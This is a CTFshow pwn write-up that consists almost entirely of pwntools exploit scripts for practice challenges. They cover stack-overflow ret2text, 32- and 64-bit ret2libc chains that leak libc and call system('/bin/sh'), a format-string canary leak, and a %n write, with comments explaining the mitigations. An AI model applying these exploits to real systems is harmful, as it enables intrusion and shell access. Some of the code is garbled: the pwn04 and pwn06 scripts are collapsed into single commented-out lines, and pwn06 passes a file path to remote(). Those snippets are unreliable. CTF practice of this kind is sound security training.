CTFshow——Pwn(1)
CTFshow——Pwn(1)
有點懶不想寫write up了。只有exploit。
PWN簽到題
# Sign-in challenge: just connect to the service and drop into an interactive
# session. The host and port ('xxx') are placeholders left by the author, not
# the real challenge endpoint.
from pwn import *

p = remote('xxx', xxx)
p.interactive()

# pwn02
# pwn02: classic 32-bit stack overflow, return-to-text.
# The payload is 0x9 + 4 bytes of filler followed by a hard-coded return
# address (0x0804850F). The filler presumably covers the buffer plus the saved
# ebp -- confirm against the binary's stack frame. A fixed 0x0804xxxx target
# only works because the binary is mapped at a constant address (no PIE); PIE
# together with a stack canary would stop this payload.
# NOTE(review): 'a' * n + p32(...) concatenates str with bytes, so these
# scripts target Python 2 pwntools; on Python 3 the filler would need to be
# b'a' * n.
from pwn import *

p = remote("pwn.chall.ctf.show", 28006)
p.sendline('a' * (0x9 + 4) + p32(0x0804850F))
p.interactive()

# pwn03
# pwn03: two-stage 32-bit ret2libc; the remote libc version is unknown, so
# LibcSearcher is used to match it from a single leaked address.
# Stage 1 overflows the buffer (9 + 4 bytes of filler, presumably buffer plus
# saved ebp) and returns into puts@plt with puts@got as its argument, so the
# service prints the runtime address of puts and then returns to main for a
# second input. Stage 2 derives system and the "/bin/sh" string from that
# leak and overflows again, this time calling system("/bin/sh").
# This relies on the binary having no PIE (fixed main address) and no stack
# canary; either mitigation alone would break the chain as written.
from pwn import *
from LibcSearcher import *

p = remote("pwn.chall.ctf.show", 28063)
elf = ELF('./stack1')
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
main = 0x080484DF  # hard-coded; elf.symbols['main'] would avoid the magic number

# Stage 1: puts(puts_got) leaks the address of puts, then return to main.
payload = 'a' * (9 + 4) + p32(puts_plt) + p32(main) + p32(puts_got)
p.recv()
p.sendline(payload)
puts_addr = u32(p.recv(4))  # assumes the 4 leaked bytes come first in the reply -- confirm

# Match the remote libc by the leaked puts address and compute the offsets.
libc = LibcSearcher('puts', puts_addr)
libc_base = puts_addr - libc.dump('puts')
system = libc_base + libc.dump('system')
binsh = libc_base + libc.dump('str_bin_sh')

# Stage 2: same overflow, now returning into system("/bin/sh").
payload = 'a' * (9 + 4) + p32(system) + p32(main) + p32(binsh)
p.recv()
p.sendline(payload)
p.interactive()

# pwn04
from pwn import * #p = process('./ex2') p =remote("pwn.chall.ctf.show",28190) p.recv() leak_canary = "%31$x" p.sendline(leak_canary) canary = int(p.recv(),16) print(hex(canary)) getshell = "a" * 100 + p32(canary) + "b" * 12 + p32(0x0804859B) p.sendline(getshell) p.interactive()pwn05
# pwn05: 32-bit ret2text into a function the author labels `flag`
# (0x08048486). Filler is 0x14 + 4 bytes (presumably buffer plus saved ebp).
# A fixed address implies no PIE, and the payload carries no canary, so a
# canary-protected build would not be exploitable this way.
from pwn import *

p = remote("pwn.chall.ctf.show", 28041)
flag = 0x08048486
payload = 'a' * (0x14 + 4) + p32(flag)
p.sendline(payload)
p.interactive()

# pwn06
glibc 2.27 版本以上需要棧平衡（rsp % 0x10 == 0），所以加了一個 ret 保證堆棧平衡。
from pwn import * #p =remote("pwn.chall.ctf.show",28012) p = remote('./pwn (1)') gdb.attach(p, 'b *0x00000000004005B4') payload = 'a' * (0xc + 8) + p64(0x0400577) + p64(0x0400577) p.sendline(payload) p.interactive()pwn07
# pwn07: two-stage 64-bit ret2libc. On x86-64 the first argument is passed in
# rdi, so a `pop rdi; ret` gadget is needed to hand puts_got to puts and the
# "/bin/sh" pointer to system. The second chain starts with a bare ret gadget
# to keep rsp 16-byte aligned before system (the glibc >= 2.27 requirement the
# author notes above). Needs no PIE (fixed gadget addresses) and no canary.
from pwn import *
from LibcSearcher import *

elf = ELF('./pwn')
p = remote('pwn.chall.ctf.show', 28081)
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
main = elf.symbols['main']
pop_rdi = 0x00000000004006e3  # presumably `pop rdi; ret`
ret = 0x00000000004004c6      # presumably a bare `ret`, used for alignment

# Stage 1: puts(puts_got) leaks the runtime address of puts, then back to main.
payload = 'a' * (0xc + 0x8) + p64(pop_rdi) + p64(puts_got) + p64(puts_plt) + p64(main)
p.sendline(payload)
p.recvline()
# puts prints the raw pointer (presumably 6 significant bytes) plus a newline;
# drop the newline and pad to 8 bytes before unpacking.
puts_addr = u64(p.recvuntil('\n')[:-1].ljust(8, '\0'))

# Match the remote libc from the leak and derive system / "/bin/sh".
libc = LibcSearcher('puts', puts_addr)
libc_base = puts_addr - libc.dump('puts')
system = libc_base + libc.dump('system')
binsh = libc_base + libc.dump('str_bin_sh')

# Stage 2: ret (align) -> pop rdi -> "/bin/sh" -> system.
payload = 'a' * (0xc + 0x8) + p64(ret) + p64(pop_rdi) + p64(binsh) + p64(system)
p.sendline(payload)
p.interactive()

# 01棧溢出之ret2text
# 01 ret2text (64-bit): 0x80 + 8 bytes of filler, a ret gadget for 16-byte
# stack alignment, then the target address 0x400637. Fixed addresses imply
# no PIE; the payload carries no canary, so none is assumed.
from pwn import *

p = remote('pwn.chall.ctf.show', 28135)
ret = 0x00000000004004fe  # presumably a bare `ret`, used for alignment
payload = 'a' * (0x80 + 8) + p64(ret) + p64(0x000000000400637)
p.sendline(payload)
p.interactive()

# pwn10
# pwn10: format-string write with %n.
# The payload puts the target address num_addr (0x0804A030, presumably a
# global the service checks) at the start of the buffer, "%12c" pads the
# output so the character count reaches 4 + 12 = 16, and "%7$n" stores that
# count through the pointer in the 7th argument slot -- the address we just
# supplied. The slot number was found by the author and is not derived here.
# Same root cause as pwn04: printf on user-controlled input. A constant format
# string removes the bug, and -D_FORTIFY_SOURCE=2 also rejects %n in writable
# format strings.
from pwn import *

p = remote('pwn.chall.ctf.show', 28120)
num_addr = 0x0804A030
payload = p32(num_addr) + '%12c%7$n'  # writes 16 into *num_addr
p.sendline(payload)
p.interactive()

# 2a1
# 20.21.2.24還沒搞出來。hhhh明天再看看有點困啊